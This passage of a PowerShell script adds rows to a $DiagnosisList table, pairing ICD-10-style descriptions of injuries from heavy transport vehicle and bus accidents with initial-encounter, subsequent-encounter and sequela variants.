collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with railway train or railway vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle","Person boarding or alighting a heavy transport vehicle injured in collision with other nonmotor vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Driver of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Passenger in heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Person on outside of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other nonmotor vehicle in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object","Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object","Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object","Person boarding or alighting a heavy transport vehicle injured in collision with fixed or stationary object, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Driver of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Passenger in heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Person on outside of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with fixed or stationary object in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident","Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident","Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident","Person boarding or alighting a heavy transport vehicle injured in noncollision transport accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident","Driver of heavy transport vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident","Passenger in heavy transport vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident","Person on outside of heavy transport vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident","Unspecified occupant of heavy transport vehicle injured in noncollision transport accident in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Driver of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Passenger in heavy transport vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with unspecified motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident","Unspecified occupant of heavy transport vehicle injured in collision with other motor vehicles in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle","Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle","Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle","Occupant (driver) (passenger) of heavy transport vehicle injured in transport accidents with military vehicle, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents","Occupant (driver) (passenger) of heavy transport vehicle injured in other specified transport accidents, sequela") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident","Occupant (driver) (passenger) of heavy transport vehicle injured in unspecified traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in nontraffic accident","Driver of bus injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in nontraffic accident","Driver of bus injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in nontraffic accident","Driver of bus injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in nontraffic accident","Passenger on bus injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in nontraffic accident","Passenger on bus injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in nontraffic accident","Passenger on bus injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident","Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident","Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident","Person on outside of bus injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident","Unspecified occupant of bus injured in collision with pedestrian or animal in nontraffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedestrian or animal","Person boarding or alighting from bus injured in collision with pedestrian or animal, initial encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedestrian or animal","Person boarding or alighting from bus injured in collision with pedestrian or animal, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Person boarding or alighting from bus injured in collision with pedestrian or animal","Person boarding or alighting from bus injured in collision with pedestrian or animal, sequela") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in traffic accident","Driver of bus injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in traffic accident","Driver of bus injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Driver of bus injured in collision with pedestrian or animal in traffic accident","Driver of bus injured in collision with pedestrian or animal in traffic accident, sequela") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in traffic accident","Passenger on bus injured in collision with pedestrian or animal in traffic accident, initial encounter") + $null = $DiagnosisList.Rows.Add("Passenger on bus injured in collision with pedestrian or animal in traffic accident","Passenger on bus injured in collision with pedestrian or animal in traffic accident, subsequent encounter") + $null = 